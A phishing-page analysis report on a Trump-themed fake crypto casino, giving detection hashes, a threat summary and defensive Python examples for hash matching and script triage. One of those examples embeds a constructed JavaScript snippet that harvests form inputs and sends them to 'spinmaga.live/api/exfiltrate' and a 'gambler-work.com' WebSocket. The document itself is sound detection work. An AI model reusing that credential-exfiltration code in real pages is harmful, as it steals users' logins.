Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Type | Algorithm | Hash Value |
|---|---|---|
| CONTENT | TLSH | T1E5E229B49230D335B1C247E8DA6425287A5FE1DDD7C695B4E388AF11B0D6CE8D9260CF |
| CONTENT | ssdeep | 384:4r/aJcuv/xRvRhiXkdvNTDhPhLxeAxeDWNW1Tp34PxeeJEmuW3AsUIRWUMd:4r/aJcuv/JhhPhleMeDGCSPxeeWmHLW |
Used to detect visually similar phishing pages based on screenshots
| Type | Algorithm | Hash Value |
|---|---|---|
| VISUAL | pHash | c73338cc783e694c |
| VISUAL | aHash | 006660307078b690 |
| VISUAL | dHash | 4ccccac3e5e46431 |
| VISUAL | wHash | a0666630787ebf98 |
| VISUAL | colorHash | 38206000000 |
| VISUAL | cropResistant | 85858a88da9a78fa,100c323232320810,4ccccac3e5e46431 |
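How the visual hashes above are actually used for clustering: each is a 64-bit digest, and two screenshots are "similar" when the Hamming distance between their digests is small; the cropResistant value is a comma-separated list of per-segment digests, matched by the best segment pair so that a cropped or padded copy still matches. The following is an added example (not code from the page or from any hashing library). It uses only the standard library, takes the hash values listed above as real input, and computes aHash/dHash on constructed 16x16 grayscale matrices that stand in for screenshots; the 10-bit cutoff is an assumed tuning value.

```python
"""Perceptual-hash similarity for phishing screenshots (added example).

Standard library only. PAGE_* values are the hashes listed on the page;
the image matrices are constructed 16x16 grayscale stand-ins for real
screenshots, so the hashes computed from them describe the constructed
input, not the captured page.
"""
from typing import Callable, Dict, List, Sequence

PAGE_HASHES = {
    "pHash": "c73338cc783e694c",
    "aHash": "006660307078b690",
    "dHash": "4ccccac3e5e46431",
    "wHash": "a0666630787ebf98",
}
# cropResistant: one dHash per detected image segment, comma separated.
PAGE_CROP_RESISTANT = "85858a88da9a78fa,100c323232320810,4ccccac3e5e46431".split(",")

SIMILAR_BITS = 10  # assumed cutoff for a 64-bit hash; tune on your own corpus


def hamming(a: str, b: str) -> int:
    """Number of differing bits between two equal-length hex hashes."""
    if len(a) != len(b):
        raise ValueError("hash lengths differ")
    return bin(int(a, 16) ^ int(b, 16)).count("1")


def crop_resistant_distance(segs_a: Sequence[str], segs_b: Sequence[str]) -> int:
    """Best (minimum) distance over all segment pairs: a cropped or padded
    copy of the page still shares at least one region with the original."""
    return min(hamming(x, y) for x in segs_a for y in segs_b)


def _shrink(gray: List[List[int]], w: int, h: int) -> List[List[int]]:
    """Nearest-neighbour downscale of a grayscale matrix (rows of 0..255)."""
    rows, cols = len(gray), len(gray[0])
    return [[gray[r * rows // h][c * cols // w] for c in range(w)] for r in range(h)]


def _to_hex(bits: str) -> str:
    return format(int(bits, 2), f"0{len(bits) // 4}x")


def ahash(gray: List[List[int]], size: int = 8) -> str:
    """Average hash: bit set where a thumbnail pixel is above the mean."""
    small = _shrink(gray, size, size)
    mean = sum(map(sum, small)) / (size * size)
    return _to_hex("".join("1" if px > mean else "0" for row in small for px in row))


def dhash(gray: List[List[int]], size: int = 8) -> str:
    """Difference hash: bit set where a pixel is brighter than its left
    neighbour on a (size+1) x size thumbnail; flat regions contribute zeros."""
    small = _shrink(gray, size + 1, size)
    return _to_hex("".join("1" if row[c + 1] > row[c] else "0"
                           for row in small for c in range(size)))


def make_image(bright: Callable[[int, int], bool], n: int = 16) -> List[List[int]]:
    """Constructed n x n grayscale 'screenshot': 200 where bright(r, c), else 50."""
    return [[200 if bright(r, c) else 50 for c in range(n)] for r in range(n)]


IMG_PAGE = make_image(lambda r, c: r < 8 and c >= 8)                      # bright top-right block
IMG_PAGE_BANNER = make_image(lambda r, c: (r < 8 and c >= 8) or r >= 14)  # same plus a bottom banner
IMG_OTHER = make_image(lambda r, c: r >= 8 and c < 8)                     # bright bottom-left block


def distances(img_a: List[List[int]], img_b: List[List[int]]) -> Dict[str, int]:
    """Per-algorithm Hamming distance between two constructed images."""
    return {"aHash": hamming(ahash(img_a), ahash(img_b)),
            "dHash": hamming(dhash(img_a), dhash(img_b))}


if __name__ == "__main__":
    print("page dHash vs cropResistant segments:",
          crop_resistant_distance([PAGE_HASHES["dHash"]], PAGE_CROP_RESISTANT))
    for name, other in (("banner variant", IMG_PAGE_BANNER), ("different layout", IMG_OTHER)):
        d = distances(IMG_PAGE, other)
        verdict = {k: "similar" if v <= SIMILAR_BITS else "different" for k, v in d.items()}
        print(name, d, verdict)
```

Two things the run makes visible. First, the page's own dHash equals the third cropResistant segment, so the crop-resistant distance is 0: the full-frame hash is one of the segments. Second, adding a flat banner to the constructed image flips eight aHash bits but no dHash bits, because dHash encodes horizontal gradients rather than absolute brightness; this is why several hash families are listed rather than one, and why a match on any one of them is only a lead until the screenshots are compared.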
• Threat: Phishing
• Target: Users interested in crypto and Donald Trump
• Method: Impersonation via a fake casino
• Exfil: wss://gambler-work.com/api/ws (potentially credentials and other data)
• Indicators: Use of Trump's image, offer of a 'Free Reward', registration form
• Risk: HIGH
The site uses a registration form to collect the user's email address and password. Because passwords are widely reused, the harvested pairs can be replayed against accounts on other services (credential stuffing); a compromised account could in turn be abused to redirect its owner or contacts to malware downloads.
User fills <input name=email> → signalsFBEventsExtractFromInputs() → fetch('https://spinmaga.live/api/exfiltrate') → Data sent to external server
Identifiers observed in the page's scripts: signalsFBEventsExtractFromInputs.js, signalsFBEventsExtractFromInputs, signalsFBEventsExtractEventPayload, 644576191807769. The function names follow the naming used by Meta Pixel's fbevents.js modules and the number has the shape of a pixel ID; the capture alone does not establish whether this is the genuine tracking script or a look-alike that reuses the names.
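The data flow above (read form inputs, then send them to an off-site endpoint) is the pattern an analyst looks for when triaging a captured page's JavaScript. The following is an added example, not code recovered from the capture: a small static check that lists network sinks with a literal URL whose host differs from the page's own host, and reports suspected exfiltration when the same script also reads form field values. The script text is constructed to mirror the described flow and reuses the two URLs named on this page; the page host `casino.example` is a placeholder, since the page does not state which host served the form.

```python
"""Static triage of a captured page script for off-site credential sinks.

Added example; SAMPLE_SCRIPT is constructed text modelled on the flow the
analysis describes, not the page's actual JavaScript.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

SAMPLE_SCRIPT = """
function signalsFBEventsExtractFromInputs(form) {
  var data = {};
  form.querySelectorAll('input').forEach(function (el) { data[el.name] = el.value; });
  return data;
}
document.querySelector('form').addEventListener('submit', function (e) {
  var payload = JSON.stringify(signalsFBEventsExtractFromInputs(e.target));
  fetch('https://spinmaga.live/api/exfiltrate', {method: 'POST', body: payload});
  new WebSocket('wss://gambler-work.com/api/ws').send(payload);
  fetch('/api/register', {method: 'POST', body: payload});
});
"""

# Network sinks that take a literal URL as their first argument.
SINK_RE = re.compile(
    r"""\b(fetch|navigator\.sendBeacon|new\s+WebSocket)\s*\(\s*['"]([^'"]+)['"]"""
)
# Code that reads form field values.
INPUT_READ_RE = re.compile(r"""\.value\b|new\s+FormData\s*\(|querySelectorAll\(\s*['"]input""")


def reads_form_inputs(script: str) -> bool:
    """True when the script pulls values out of form fields."""
    return INPUT_READ_RE.search(script) is not None


def offsite_sinks(script: str, page_host: str) -> List[Tuple[str, str]]:
    """(sink, url) pairs whose host differs from the page's own host.
    Relative URLs and same-host calls are dropped as ordinary site traffic."""
    found = []
    for m in SINK_RE.finditer(script):
        sink, url = re.sub(r"\s+", " ", m.group(1)), m.group(2)
        host = urlparse(url).hostname
        if host and host.lower() != page_host.lower():
            found.append((sink, url))
    return found


def triage(script: str, page_host: str) -> Dict[str, object]:
    """Flag a script that both reads inputs and ships data to another host."""
    sinks = offsite_sinks(script, page_host)
    reads = reads_form_inputs(script)
    return {"reads_inputs": reads, "offsite_sinks": sinks, "suspect_exfil": reads and bool(sinks)}


if __name__ == "__main__":
    # "casino.example" is a placeholder for the host that served the form.
    for host in ("casino.example", "spinmaga.live"):
        print(host, triage(SAMPLE_SCRIPT, host))
```

Run it with the page host set to `spinmaga.live` and only the WebSocket to gambler-work.com remains flagged, which is the distinction between "the site posts to its own API" and "the form data leaves the site"; a capture should record which host actually served the page before this check is read as evidence. The regex only sees literal URLs, so a script that assembles the endpoint at runtime needs dynamic instrumentation instead.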
Pages with identical visual appearance (based on perceptual hash)